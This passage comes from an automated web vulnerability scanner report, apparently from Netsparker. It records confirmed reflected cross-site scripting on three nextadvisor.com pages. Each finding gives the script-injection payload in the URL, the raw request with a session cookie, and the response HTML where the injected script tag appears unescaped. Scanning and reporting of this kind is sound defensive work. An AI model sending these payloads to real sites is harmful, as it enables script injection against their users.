name="ie" 
value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_meeting"> <input type="hidden" name="FieldData4" 
value="..
- /parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E

/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparke..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002EE)</script>

Request

GET /parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/parental_controls/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6661
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", parental controls, parental control, Net Nanny, Bsecure CloudCare 6.1, SocialShield, WebWatcher, SafeEyes, CyberPatrol, McGruff SafeGuard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/parental_controls/'"--></style></script><script>netsparker(0x0002EE)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start 
Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002EE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/parental_controls_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Parental Control Software FAQ</h1> <p>Frequently Asked Questions about Parental Control Software</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Parental Control Software:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input 
type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="parental_controls"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E

/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00030F)</script>

Request

GET /payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/payday_loans/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6768
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", payday lender, loans, united states, CashNet USA, Cash Central, PayDayOne, Speedy Cash, Check 'n Go, MyPayDayLoan, PayDayMax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/payday_loans/'"--></style></script><script>netsparker(0x00030F)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div 
id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> 
</form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00030F)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 
'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/payday_loans_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Payday Loan Reviews FAQ</h1> <p>Frequently Asked Questions about Payday Loan Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Payday Loan Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the 
question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="payday_loans"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E

/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000310)</script>

Request

GET /people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/people_search/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6557
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", people search, people searches, background checks, people finder, Intelius, Net Detective, Exploreos, IntegraScan, US Search, PeopleFinders" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/people_search/'"--></style></script><script>netsparker(0x000310)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start 
Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000310)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && 
showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/people_search_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> People Search and Background Checks FAQ</h1> <p>Frequently Asked Questions about People Search and Background Checks</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about People Search and Background Checks:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" 
